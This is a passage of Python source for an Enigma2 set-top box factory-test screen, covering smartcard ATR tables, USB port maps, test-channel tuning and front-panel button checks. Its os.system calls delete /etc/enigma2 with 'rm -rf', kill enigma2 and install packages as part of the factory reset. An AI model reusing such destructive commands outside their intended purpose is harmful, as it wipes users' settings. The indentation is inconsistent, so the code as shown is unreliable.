chr(0x3b) + chr(0x24) + chr(0x00) : "Conax",
chr(0x3b) + chr(0x34) + chr(0xd6) : "Drecrypt",
chr(0x3f) + chr(0xff) + chr(0x95) : "Nagravision",
chr(0x3f) + chr(0x7f) + chr(0x13) : "NDS",
chr(0x3f) + chr(0xfd) + chr(0x13) : "NDS",
chr(0x3f) + chr(0x27) + chr(0x17) : "Viaccess",
chr(0x3f) + chr(0x77) + chr(0x18) : "Viaccess",
chr(0x3b) + chr(0x77) + chr(0x18) : "Viaccess",
chr(0x3b) + chr(0x9c) + chr(0x13) + chr(0x11) + chr(0x81) + chr(0x64) + chr(0x72) : "Firecrypt",
chr(0x3b) + chr(0xec) + chr(0x00) + chr(0x00) + chr(0x40) + chr(0x38) + chr(0x57) : "Type1",
chr(0x3b) + chr(0xff) + chr(0xe0) + chr(0x1c) + chr(0x57) + chr(0xe0) + chr(0x74) : "Type2",
chr(0x3f) + chr(0xfd) + chr(0x95) + chr(0x00) + chr(0xff) + chr(0x91) + chr(0x81) : "Type3"}
# 0 - front, 1 - upper rear, 2 - lower rear
USBDB = {
"tmtwinoe":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"tm2toe":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"tmsingle":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"tmnanooe":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"ios100hd":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"ios200hd":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"ios300hd":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"mediabox":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"optimussos1":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"optimussos2":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
},
"tmnano2t":
{
"/devices/platform/ehci-brcm.1/usb2/2-1/2-1:1.0": 0,
"/devices/platform/ehci-brcm.0/usb1/1-1/1-1:1.0": 1,
"/devices/platform/ehci-brcm.0/usb1/1-2/1-2:1.0": 2,
}
}
    def __init__(self, session):
        """Factory-test menu screen.

        Resets the box to a known test configuration, builds the channel /
        front-panel test menu for the detected model and starts the periodic
        hardware pollers (network link, smartcards, CI slots, storage).
        """
        Screen.__init__(self, session)
        self.session = session
        if HardwareInfo().get_device_name() == "mediabox":
            os.system("opkg remove enigma2-plugin-channel.non.motorized-techsat-17-29-57")
        # Wipe settings, mark factory-test mode and unpack the test settings.
        # assumes /etc/.e2settings.tar holds the factory-test configuration -- TODO confirm
        os.system("rm /etc/enigma2 -rf; touch /etc/.run_factory_test; tar xf /etc/.e2settings.tar -C /")
        configfile.load()
        nimmanager.readTransponders()
        InitNimManager(nimmanager)
        eDVBDB.getInstance().reloadBouquets()
        eDVBDB.getInstance().reloadServicelist()
        self.iface = "eth0"
        # Remote-control and front-panel key bindings for the test screen.
        self["actions"] = NumberActionMap(["WizardActions", "InputActions", "ColorActions", "DirectionActions", "InfobarChannelSelection", "StandbyActions", "GlobalActions", "TimerEditActions"],
        {
            "ok": self.go,
            "back": self.cancel,
            "up": self.up,
            "down": self.down,
            "1": self.keyNumberGlobal,
            "2": self.keyNumberGlobal,
            "3": self.keyNumberGlobal,
            "4": self.keyNumberGlobal,
            "5": self.keyNumberGlobal,
            "6": self.keyNumberGlobal,
            "7": self.keyNumberGlobal,
            "8": self.keyNumberGlobal,
            "9": self.keyNumberGlobal,
            "0": self.keyNumberGlobal,
            "red": self.keyRed,
            "green": self.keyGreen,
            "yellow": self.keyYellow,
            "blue": self.keyBlue,
            "left": self.frontButtonLeft,
            "right": self.frontButtonRight,
            "exit": self.frontButtonExit,
            "menu": self.frontButtonMenu,
            "power": self.frontButtonPower,
            "ChannelPlusPressed": self.frontButtonChPlus,
            "ChannelMinusPressed": self.frontButtonChMinus,
            "volumeUp": self.frontButtonVolUp,
            "volumeDown": self.frontButtonVolDown,
            "log": self.frontButtonInfo,
        }, -1)
        # Per-model capability flags derived from the hardware name.
        model = HardwareInfo().get_device_name()
        self.has_fan = model not in ("ios300hd", "mediabox" )
        self.has_nav_keys = model not in ("tmtwinoe", "ios100hd", "mediabox", "ios200hd", "optimussos2")
        self.has_8_buttons = model in ("tmtwinoe", "ios100hd")
        self.has_9_buttons = model in ("tm2toe", "tmsingle")
        self.has_7_buttons = model in ("tmnanooe", "ios300hd", "optimussos1" )
        self.has_5_buttons = model in ("mediabox","ios200hd", "optimussos2", "tmnano2t" )
        self.has_fan_sensor = model in ("tmtwinoe", "tm2toe", "ios100hd" )
        self.has_sata = model not in ("ios300hd", "mediabox")
        # self.has_1_rear_usb = "tmnano" in model
        self.has_sc41cr = model in ("ios200hd", "tmnanooe","optimussos1","optimussos2", "tmnano2t" )
        self.has_1_tuner = model in ("tmnanooe", "ios300hd", "mediabox", "tmsingle", "optimussos1")
        self.has_vfd = model not in ("tmsingle", "tmnanooe", "ios200hd", "ios300hd", "mediabox", "optimussos1", "tmnano2t" )
        # Menu entries are [caption, tag, handler] triples; tuner 2 channels
        # are only offered when a second NIM is present.
        self.MENU_LIST = []
        self.MENU_LIST.append([ "[T1] H18, 720P, CVBS, 4:3, 22OFF (TRACE URB)", "ch1", self.func ])
        self.MENU_LIST.append([ "[T1] V14, 576i, YC, 4:3, 22OFF (MASTV)", "ch2", self.func ])
        if len(nimmanager.nimList()) == 2:
            self.MENU_LIST.append([ "[T2] H18, 576i, RGB, 16:9, 22OFF (France 24)", "ch3", self.func ])
            self.MENU_LIST.append([ "[T2] V14, 1080i, CVBS, 16:9, 22OFF (NewSky)", "ch4", self.func ])
        else:
            self.MENU_LIST.append([ "[T1] H18, 576i, RGB, 16:9, 22OFF (France 24)", "ch3", self.func ])
            self.MENU_LIST.append([ "[T1] V14, 1080i, CVBS, 16:9, 22OFF (NewSky)", "ch4", self.func ])
        self.MENU_LIST.append([ "22Khz - ON /[OFF]", "tone", self.func ])
        if self.has_fan:
            self.MENU_LIST.append([ "FAN - [ON]/ OFF", "fan", self.func ])
        self.MENU_LIST.append([ "FRONT PANEL", "fp", self.func ])
        self.MENU_LIST.append([ "DEEP STANDBY", "ds", self.func ])
        # Front-panel button test table: widget name, handler and label text
        # per key; trimmed below to match the model's physical buttons.
        self.BUTTON_TEST = {
            "ok": { "button":"button_ok", "func":self.frontButtonOk, "pressed":False, "text":"OK" },
            "up": { "button":"button_up", "func":self.frontButtonUp, "pressed":False, "text":"^" },
            "down": { "button":"button_down", "func":self.frontButtonDown, "pressed":False, "text":"V" },
            "left": { "button":"button_left", "func":self.frontButtonLeft, "pressed":False, "text":"<" },
            "right": { "button":"button_right", "func":self.frontButtonRight, "pressed":False, "text":">" },
            "exit": { "button":"button_exit", "func":self.frontButtonExit, "pressed":False, "text":"EXIT" },
            "menu": { "button":"button_menu", "func":self.frontButtonMenu, "pressed":False, "text":"MENU" },
            "power": { "button":"button_power", "func":self.frontButtonPower, "pressed":False, "text":"POWER" }}
        if not self.has_nav_keys:
            self.BUTTON_TEST["up"]["text"] = "VOL+"
            self.BUTTON_TEST["up"]["func"] = self.frontButtonVolUp
            self.BUTTON_TEST["down"]["text"] = "VOL-"
            self.BUTTON_TEST["down"]["func"] = self.frontButtonVolDown
            self.BUTTON_TEST["left"]["text"] = "CH-"
            self.BUTTON_TEST["left"]["func"] = self.frontButtonChMinus
            self.BUTTON_TEST["right"]["text"] = "CH+"
            self.BUTTON_TEST["right"]["func"] = self.frontButtonChPlus
        if self.has_9_buttons:
            self.BUTTON_TEST["info"] = { "button":"button_info", "func":self.frontButtonInfo, "pressed":False, "text":"INFO" }
        if self.has_7_buttons:
            self.BUTTON_TEST.pop("exit")
        if self.has_5_buttons:
            self.BUTTON_TEST.pop("exit")
            self.BUTTON_TEST.pop("menu")
            self.BUTTON_TEST.pop("ok")
        self.fpTestMode = False
        self.service = "ch1"
        self.setMenuList(self.MENU_LIST)
        self.setTestItemsLabel()
        # models using fan ic, available rpm, temp
        if self.has_fan_sensor:
            self.initFanSensors()
        # One-shot network poll; the others repeat every second.
        self.networkMonitor = eTimer()
        self.networkMonitor.callback.append(self.getLinkState)
        self.networkMonitor.start(1000, True)
        self.smartcardInserted = [ False, False ]
        self.smartcardMonitor = eTimer()
        self.smartcardMonitor.callback.append(self.getSCState)
        self.smartcardMonitor.start(1000, False)
        self.ciMonitor = eTimer()
        self.ciMonitor.callback.append(self.getCIState)
        self.ciMonitor.start(1000, False)
        self.storageMonitor = eTimer()
        self.storageMonitor.callback.append(self.getStorageState)
        self.storageMonitor.start(1000, False)
        self.onLayoutFinish.append(self.layoutFinished)
def cancel(self):
if self.fpTestMode:
self.frontButtonExit()
# else:
# self.session.openWithCallback(self.quitConfirmed, MessageBox, _("Do you really want to quit?"), default = False)
def quitConfirmed(self, answer):
if answer:
self.quit(3)
    def quit(self, mode):
        """Stop all pollers and leave the factory test.

        mode 1: wipe the enigma2 settings and shut down via quitMainloop;
        mode 3: clear the factory-test marker and kill enigma2 (restarted
        by the init scripts).
        """
        self.networkMonitor.stop()
        self.smartcardMonitor.stop()
        self.ciMonitor.stop()
        self.storageMonitor.stop()
        self.hide()
        if mode == 1:
            os.system("rm /etc/enigma2 -rf")
            self.hide()
            # Show the shutdown screen while the main loop goes down.
            self.quitScreen = self.session.instantiateDialog(QuitMainloopScreen,retvalue=mode)
            self.quitScreen.show()
            quitMainloop(mode)
        elif mode == 3:
            os.system("rm /etc/.run_factory_test -f; rm /etc/enigma2 -rf")
            if HardwareInfo().get_device_name() == "mediabox":
                os.system("tar xvf /etc/var.tar -C /; opkg install /tmp/enigma2-plugin-channel.non.motorized-techsat-17-29-57_20130610_all.ipk")
            os.system("killall enigma2")
def up(self):
if self.fpTestMode:
self.frontButtonUp()
else:
if len(self["menulist"].list) > 0:
while 1:
self["menulist"].instance.moveSelection(self["menulist"].instance.moveUp)
if self["menulist"].l.getCurrentSelection()[0][0] != "--" or self["menulist"].l.getCurrentSelectionIndex() == 0:
break
os.system("echo \"%s\" > /proc/stb/lcd/show_txt" % self["menulist"].l.getCurrentSelection()[0][0])
self.vfdTextWrite(self["menulist"].l.getCurrentSelection()[0][0])
def down(self):
if self.fpTestMode:
self.frontButtonDown()
else:
if len(self["menulist"].list) > 0:
while 1:
self["menulist"].instance.moveSelection(self["menulist"].instance.moveDown)
if self["menulist"].l.getCurrentSelection()[0][0] != "--" or self["menulist"].l.getCurrentSelectionIndex() == len(self["menulist"].list) - 1:
break
os.system("echo \"%s\" > /proc/stb/lcd/show_txt" % self["menulist"].l.getCurrentSelection()[0][0])
self.vfdTextWrite(self["menulist"].l.getCurrentSelection()[0][0])
# runs a number shortcut
def keyNumberGlobal(self, number):
if self.fpTestMode:
return
else:
self.goKey(str(number))
# runs the current selected entry
def go(self):
if self.fpTestMode:
self.frontButtonOk()
else:
cursel = self["menulist"].l.getCurrentSelection()
if cursel:
self.goEntry(cursel[0])
else:
self.cancel()
# runs a specific entry
def goEntry(self, entry):
# do self.func
os.system("echo \"%s\" > /proc/stb/lcd/show_txt" % entry[0])
self.vfdTextWrite(entry[0])
entry[2](entry)
# lookups a key in the keymap, then runs it
def goKey(self, key):
if self.keymap.has_key(key):
self["menulist"].instance.moveSelectionTo(self.__keys.index(key))
entry = self.keymap[key]
self.goEntry(entry)
# runs a color shortcut
def keyRed(self):
if self.fpTestMode:
self.fpTestQuit()
else:
self.goKey("red")
    # The remaining color keys simply dispatch through the keymap that
    # setMenuList() builds; they have no front-panel-test behaviour.
    def keyGreen(self):
        self.goKey("green")
    def keyYellow(self):
        self.goKey("yellow")
    def keyBlue(self):
        self.goKey("blue")
# ---------------------------------------------------------------------
# ui
# ---------------------------------------------------------------------
    def setMenuList(self, list):
        """Build the ChoiceList widget and the digit/color-key -> entry keymap.

        ``list`` items are ``[caption, tag, handler]`` triples.  The first
        entries get bound to digits 1-9 and the color keys; "0" is reserved
        for the EXIT entry appended here.
        """
        self.list = []
        # 0 for exit
        # self.__keys = [ "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "red", "green", "yellow", "blue" ] + (len(list) - 10) * [""]
        self.__keys = [ "1", "2", "3", "4", "5", "6", "7", "8", "9", "red", "green", "yellow", "blue" ] + (len(list) - 10) * [""]
        pos = 0
        self.keymap = {}
        for x in list:
            strpos = str(self.__keys[pos])
            self.list.append(ChoiceEntryComponent(key = strpos, text = x))
            if self.__keys[pos] != "":
                self.keymap[self.__keys[pos]] = list[pos]
            pos += 1
        # 0 for exit, add to end of menu list
        self.keymap["0"] = [ "EXIT", "exit", self.func ]
        self.list.append(ChoiceEntryComponent(key = "0", text = self.keymap["0"]))
        # NOTE(review): with more than 13 menu entries the padding above
        # underfills self.__keys and the indexing raises IndexError --
        # verify the maximum menu length against the models above.
        self.__keys[pos] = "0"
        # Create the widget on first call, update it in place afterwards.
        if not self.has_key("menulist"):
            self["menulist"] = ChoiceList(self.list)
        else:
            self["menulist"].hide()
            self["menulist"].setList(self.list)
            self["menulist"].show()
    def setTestItemsLabel(self):
        """Create all static caption (``*_i``) and status (``*_s``) labels
        shown on the test screen; status labels start as " N/A"."""
        self["label0"] = Label(_(" TEST MENU"))
        self["label1"] = Label(_(" SYSTEM INFORMATION"))
        self["lan_i"] = Label(_(" IP"))
        self["lan_s"] = MultiColorLabel(_(" N/A"))
        self["sata_i"] = Label(_(" iSATA"))
        self["sata_s"] = MultiColorLabel(_(" N/A"))
        # not support internal sata
        if not self.has_sata:
            self["sata_i"].hide()
            self["sata_s"].hide()
        self["info0_i"] = Label(_(" Hardware"))
        self["info0_s"] = MultiColorLabel(_(" N/A"))
        self["info1_i"] = Label(_(" Version"))
        self["info1_s"] = MultiColorLabel(_(" N/A"))
        self["mac_i"] = Label(_(" Mac Address"))
        self["mac_s"] = MultiColorLabel(_(" N/A"))
        self["micom_i"] = Label(_(" Micom Version"))
        self["micom_s"] = MultiColorLabel(_(" N/A"))
        # Two rows each for smartcard slots, CI slots and security chips.
        for i in (0, 1):
            self["sc%d_i" % i] = Label(_(" SC Slot-%d" % (i+1)))
            self["sc%d_s" % i] = MultiColorLabel(_(" N/A"))
            self["ci%d_i" % i] = Label(_(" CI Slot-%d" % (i+1)))
            self["ci%d_s" % i] = MultiColorLabel(_(" N/A"))
            self["security%d_i" % i] = Label(_(" Security%d" % i))
            self["security%d_s" % i] = MultiColorLabel(_(" N/A"))
        self["usb0_i"] = Label(_(" Front USB"))
        self["usb0_s"] = MultiColorLabel(_(" N/A"))
        self["usb1_i"] = Label(_(" Rear USB-1"))
        self["usb1_s"] = MultiColorLabel(_(" N/A"))
        self["usb2_i"] = Label(_(" Rear USB-2"))
        self["usb2_s"] = MultiColorLabel(_(" N/A"))
        ## will change rear 2 usb model for tmnanooe, optimussos1
        # if self.has_1_rear_usb:
        #     self["usb1_i"].setText(_(" Rear USB"))
        #     self["usb2_i"].hide()
        #     self["usb2_s"].hide()
        # Button-test indicators start hidden; shown during the FP test.
        for button in self.BUTTON_TEST:
            self[self.BUTTON_TEST[button]["button"]] = MultiColorLabel(_(self.BUTTON_TEST[button]["text"]))
            self[self.BUTTON_TEST[button]["button"]].hide()
    def layoutFinished(self):
        """Fill the static system-information fields once the skin is applied,
        start the first test channel and force full volume."""
        model = HardwareInfo().get_device_name()
        if model == "optimussos1":
            self["info0_s"].setText(_("OPTIMUSS OS1"))
        elif model == "optimussos2":
            self["info0_s"].setText(_("OPTIMUSS OS2"))
        else:
            self["info0_s"].setText(_(" %s" % (about.getHardwareTypeString())))
        self["info1_s"].setText(_(" %s" % (self.TEST_PROG_VERSION)))
        self["mac_s"].setText(_(" %s" % self.getMacaddress()))
        self["micom_s"].setText(_(" %s" % self.getMicomVersion()))
        # checkSecurityChip() returns a bitmask; 0xf apparently means "no
        # security chips on this model" -- TODO confirm against its definition.
        securityRes = self.checkSecurityChip()
        if securityRes == 0xf:
            for i in (0, 1):
                self["security%d_i" % i].hide()
                self["security%d_s" % i].hide()
        elif self.has_sc41cr:
            if securityRes:
                self["security0_s"].setText(_(" SC41CR - NOK"))
                self["security0_s"].setForegroundColorNum(1)
            else:
                self["security0_s"].setText(_(" SC41CR - OK"))
            self["security1_i"].hide()
            self["security1_s"].hide()
        else:
            # presumably bit 1 flags the CO164 chip check result -- verify.
            if securityRes>>1 & 1:
                self["security0_s"].setText(_(" CO164 - NOK"))
                self["security0_s"].setForegroundColorNum(1)
            else:
                self["security0_s"].setText(_(" CO164 - OK"))
            self["security1_i"].hide()
            self["security1_s"].hide()
        # Tune the first test channel and set volume to maximum for the test.
        self.keyNumberGlobal(1)
        from enigma import eDVBVolumecontrol
        eDVBVolumecontrol.getInstance().setVolume(100, 100)
# ---------------------------------------------------------------------
# menulist functions
# ---------------------------------------------------------------------
	def func(self, entry):
		"""Dispatch a selected test-menu *entry* (a [label, id] pair).

		ch1..ch4 entries set video mode / color format / aspect before
		tuning; "tone" toggles the 22 kHz tone (with a dummy channel hop so
		the tuner re-reads its configuration); "fan", "fp", "ds" and "exit"
		run the corresponding sub-tests.  Finally the selected entry's
		label is mirrored to the VFD.
		"""
		self["menulist"].hide()
		if "ch1" in entry[1]:
			video_hw.setMode("Scart", "720p", "50Hz")
			config.av.colorformat.value = "cvbs"
			open("/proc/stb/video/aspect", "w").write("4:3")
			self.setTone("off")
			self.playService(entry[1])
		elif "ch2" in entry[1]:
			video_hw.setMode("YPbPr", "576i", "50Hz")
			config.av.colorformat.value = "yuv"
			open("/proc/stb/video/aspect", "w").write("4:3")
			self.setTone("off")
			self.playService(entry[1])
		elif "ch3" in entry[1]:
			video_hw.setMode("Scart", "576i", "50Hz")
			config.av.colorformat.value = "rgb"
			open("/proc/stb/video/aspect", "w").write("16:9")
			self.setTone("off")
			self.playService(entry[1])
		elif "ch4" in entry[1]:
			video_hw.setMode("Scart", "1080i", "50Hz")
			config.av.colorformat.value = "cvbs"
			open("/proc/stb/video/aspect", "w").write("16:9")
			self.setTone("off")
			self.playService(entry[1])
		elif entry[1] == "tone":
			# the label carries the current state: "[ON]" means tone is on
			if "[ON]" in entry[0]:
				self.setTone("off")
			else:
				self.setTone("on")
			# TODO - romove below channel change codes,
			# without channel change, tuner configuration does not change
			if self.service == "ch1":
				self.playService("ch2")
				self.playService("ch1")
			elif self.service == "ch2":
				self.playService("ch1")
				self.playService("ch2")
			elif self.service == "ch3":
				self.playService("ch4")
				self.playService("ch3")
			elif self.service == "ch4":
				self.playService("ch3")
				self.playService("ch4")
		elif entry[1] == "fan":
			if "[ON]" in entry[0]:
				self.setFan("off")
			else:
				self.setFan("on")
		elif entry[1] == "fp":
			self.fpTest()
		elif entry[1] == "ds":
			self.deepStandby()
		elif entry[1] == "exit":
			self.session.openWithCallback(self.quitConfirmed, MessageBox, _("Do you really want to quit?"), default = True)
		else:
			print "what", entry
		self["menulist"].show()
		# mirror the selected entry's (possibly renamed) label to the VFD
		index = 0
		for menu in self.MENU_LIST:
			if menu[1] == entry[1]:
				os.system("echo \"%s\" > /proc/stb/lcd/show_txt" % self.MENU_LIST[index][0])
				self.vfdTextWrite(self.MENU_LIST[index][0])
				break
			index += 1
def changeMenuName(self, menuid, menutext):
index = 0
for menu in self.MENU_LIST:
if menu[1] == menuid:
self.MENU_LIST[index][0] = menutext
break
index += 1
self.setMenuList(self.MENU_LIST)
# ---------------------------------------------------------------------
# channel
# ---------------------------------------------------------------------
	def playService(self, service=None):
		"""Tune to one of the four hard-coded test services ("ch1".."ch4").

		Remembers the last channel in self.service so callers may re-tune
		by calling with no argument.  ch3/ch4 use different service
		references on twin-tuner models (nimList length 2).
		"""
		if service:
			self.service = service
		self.session.nav.stopService()
		if self.service == "ch1":
			self.session.nav.playService(eServiceReference("1:0:1:F:1:9D:C00000:0:0:0:"))
		elif self.service == "ch2":
			self.session.nav.playService(eServiceReference("1:0:1:6:1:1:C00000:0:0:0:"))
		elif self.service == "ch3":
			if len(nimmanager.nimList()) == 2:
				self.session.nav.playService(eServiceReference("1:0:1:8:1:FFFF:C80FA0:0:0:0:"))
			else:
				self.session.nav.playService(eServiceReference("1:0:1:8:1:FFFF:C00FA0:0:0:0:"))
		elif self.service == "ch4":
			if len(nimmanager.nimList()) == 2:
				self.session.nav.playService(eServiceReference("1:0:1:2:1:1:C89034:0:0:0:"))
			else:
				self.session.nav.playService(eServiceReference("1:0:1:2:1:1:C00000:0:0:0:"))
	def setTone(self, tone):
		"""Force the 22 kHz tone "on"/"off" for the test transponders.

		Sat entry 192 is always configured on tuner A; sat entry 200 lives
		on tuner A for single-tuner models, otherwise on tuner B.  The
		menu label is updated to reflect the new state.
		"""
		config.Nims[0].advanced.sat[192].tonemode.value = tone
		if self.has_1_tuner:
			config.Nims[0].advanced.sat[200].tonemode.value = tone
		else:
			config.Nims[1].advanced.sat[200].tonemode.value = tone
		# push the new tone mode down to the sec hardware layer
		nimmanager.sec.update()
		if tone == "on":
			self.changeMenuName("tone", "22Khz - [ON]/ OFF")
		else:
			self.changeMenuName("tone", "22Khz - ON /[OFF]")
# ---------------------------------------------------------------------
# fp, CODE IS DIRTY
# ---------------------------------------------------------------------
def frontButtonPass(self):
return
	def frontButtonOk(self, pressed=True):
		"""Front-panel OK key handler for the button test.

		Shows/hides the OK label, records the press state and re-checks
		whether the whole front-panel test is complete.
		"""
		if not self.fpTestMode:
			return
		if not self.BUTTON_TEST.has_key("ok"):
			return
		if pressed:
			self["button_ok"].show()
		else:
			self["button_ok"].hide()
		self.BUTTON_TEST["ok"]["pressed"] = pressed
		self.checkFpTestIsOk()
		# restart the VFD scroll text after the key press
		os.system("echo VFD START > /proc/stb/lcd/show_txt")
	def frontButtonUp(self, pressed=True):
		"""Front-panel UP key handler (only on models with nav keys)."""
		if not self.fpTestMode:
			return
		if not self.BUTTON_TEST.has_key("up"):
			return
		if not self.has_nav_keys:
			return
		if pressed:
			self["button_up"].show()
		else:
			self["button_up"].hide()
		self.BUTTON_TEST["up"]["pressed"] = pressed
		self.checkFpTestIsOk()
	def frontButtonDown(self, pressed=True):
		"""Front-panel DOWN key handler (only on models with nav keys)."""
		if not self.fpTestMode:
			return
		if not self.BUTTON_TEST.has_key("down"):
			return
		if not self.has_nav_keys:
			return
		# NOTE(review): models WITHOUT a "menu" test key restart the VFD
		# scroll here instead — confirm this is intentional
		if not self.BUTTON_TEST.has_key("menu"):
			os.system("echo VFD START > /proc/stb/lcd/show_txt")
		if pressed:
			self["button_down"].show()
		else:
			self["button_down"].hide()
		self.BUTTON_TEST["down"]["pressed"] = pressed
		self.checkFpTestIsOk()
	def frontButtonLeft(self, pressed=True):
		"""Front-panel LEFT key handler (only on models with nav keys)."""
		if not self.fpTestMode:
			return
		if not self.BUTTON_TEST.has_key("left"):
			return
		if not self.has_nav_keys:
			return
		if pressed:
			self["button_left"].show()
		else:
			self["button_left"].hide()
		self.BUTTON_TEST["left"]["pressed"] = pressed
		self.checkFpTestIsOk()
	def frontButtonRight(self, pressed=True):
		"""Front-panel RIGHT key handler (only on models with nav keys)."""
		if not self.fpTestMode:
			return
		if not self.BUTTON_TEST.has_key("right"):
			return
		if not self.has_nav_keys:
			return
		if pressed:
			self["button_right"].show()
		else:
			self["button_right"].hide()
		self.BUTTON_TEST["right"]["pressed"] = pressed
		self.checkFpTestIsOk()
def frontButtonMenu(self, pressed=True):
if not self.fpTestMode:
return
if not self.BUTTON_TEST.has_key("ok"):
return
if pressed:
self["button_menu"].show()
else:
self["button_menu"].hide()
self.BUTTON_TEST["menu"]["pressed"] = pressed
self.checkFpTestIsOk()
os.system("echo VFD START > /proc/stb/lcd/show_txt")
	def frontButtonExit(self, pressed=True):
		"""Front-panel EXIT key handler for the button test."""
		if not self.fpTestMode:
			return
		if not self.BUTTON_TEST.has_key("exit"):
			return
		if pressed:
			self["button_exit"].show()
		else:
			self["button_exit"].hide()
		self.BUTTON_TEST["exit"]["pressed"] = pressed
		self.checkFpTestIsOk()
	def frontButtonPower(self, pressed=True):
		"""Front-panel POWER key handler for the button test."""
		if not self.fpTestMode:
			return
		if not self.BUTTON_TEST.has_key("power"):
			return
		if pressed:
			self["button_power"].show()
		else:
			self["button_power"].hide()
		self.BUTTON_TEST["power"]["pressed"] = pressed
		self.checkFpTestIsOk()
	def frontButtonChPlus(self, pressed=True):
		"""Front-panel CH+ key handler; maps onto the "right" test slot."""
		if not self.fpTestMode:
			return
		if not self.BUTTON_TEST.has_key("right"):
			return
		if pressed:
			self["button_right"].show()
		else:
			self["button_right"].hide()
		self.BUTTON_TEST["right"]["pressed"] = pressed
		self.checkFpTestIsOk()
	def frontButtonChMinus(self, pressed=True):
		"""Front-panel CH- key handler; maps onto the "left" test slot."""
		if not self.fpTestMode:
			return
		if not self.BUTTON_TEST.has_key("left"):
			return
		# NOTE(review): models WITHOUT a "menu" test key restart the VFD
		# scroll here instead — confirm this is intentional
		if not self.BUTTON_TEST.has_key("menu"):
			os.system("echo VFD START > /proc/stb/lcd/show_txt")
		if pressed:
			self["button_left"].show()
		else:
			self["button_left"].hide()
		self.BUTTON_TEST["left"]["pressed"] = pressed
		self.checkFpTestIsOk()
	def frontButtonVolUp(self, pressed=True):
		"""Front-panel VOL+ key handler; maps onto the "up" test slot."""
		if not self.fpTestMode:
			return
		if not self.BUTTON_TEST.has_key("up"):
			return
		if pressed:
			self["button_up"].show()
		else:
			self["button_up"].hide()
		self.BUTTON_TEST["up"]["pressed"] = pressed
		self.checkFpTestIsOk()
	def frontButtonVolDown(self, pressed=True):
		"""Front-panel VOL- key handler; maps onto the "down" test slot."""
		if not self.fpTestMode:
			return
		if not self.BUTTON_TEST.has_key("down"):
			return
		if pressed:
			self["button_down"].show()
		else:
			self["button_down"].hide()
		self.BUTTON_TEST["down"]["pressed"] = pressed
		self.checkFpTestIsOk()
	def frontButtonInfo(self, pressed=True):
		"""Front-panel INFO key handler for the button test."""
		if not self.fpTestMode:
			return
		if not self.BUTTON_TEST.has_key("info"):
			return
		# NOTE(review): has_key() on self — presumably the Screen exposes a
		# dict-like widget lookup; verify the widget actually exists
		if not self.has_key("button_info"):
			return
		if pressed:
			self["button_info"].show()
		else:
			self["button_info"].hide()
		self.BUTTON_TEST["info"]["pressed"] = pressed
		self.checkFpTestIsOk()
	def fpTestQuit(self):
		"""Leave front-panel test mode without requiring every button."""
		self.changeMenuName("fp", "FRONT PANEL")
		self.fpTestMode = False
		# restore the idle text on the VFD
		os.system("echo ^0^ > /proc/stb/lcd/show_txt")
def checkFpTestIsOk(self):
exit = True
for button in self.BUTTON_TEST:
if not self.BUTTON_TEST[button]["pressed"]:
exit = False
break
if exit:
for button in self.BUTTON_TEST:
self[self.BUTTON_TEST[button]["button"]].setForegroundColorNum(1)
self.changeMenuName("fp", "FRONT PANEL - OK")
self.fpTestMode = False
os.system("echo '^0^' > /proc/stb/lcd/show_txt")
def vfdOn(self, on):
fp = open('/dev/dbox/lcd0', 'w')
fcntl.ioctl(fp.fileno(), 0x123321, on)
	def vfdTextWrite(self, text):
		"""Write *text* to the VFD display.

		NOTE(review): the unconditional ``return`` below disables this
		method entirely — everything after it is dead code.  It looks like
		a deliberate kill-switch; confirm before re-enabling.
		"""
		return
		if self.has_vfd:
			if os.path.exists('/proc/stb/lcd/show_txt'):
				open('/proc/stb/lcd/show_txt', 'w').write(text)
	def fpTest(self):
		"""Enter front-panel test mode.

		Resets every BUTTON_TEST entry to "not pressed" (by invoking each
		entry's handler with False) and clears the label colors.
		"""
		if self.fpTestMode:
			return
		self.fpTestMode = True
		self.changeMenuName("fp", " \"PRESS FRONT BUTTONS(RED TO QUIT)\"")
		os.system("echo VFD START > /proc/stb/lcd/show_txt")
		for button in self.BUTTON_TEST:
			self.BUTTON_TEST[button]["func"](False)
			self[self.BUTTON_TEST[button]["button"]].setForegroundColorNum(0)
# ---------------------------------------------------------------------
# fan
# ---------------------------------------------------------------------
def setFan(self, power):
if power == "on":
self.changeMenuName("fan", "FAN - [ON]/ OFF")
fancontrol.setPWM(0, 255)
else:
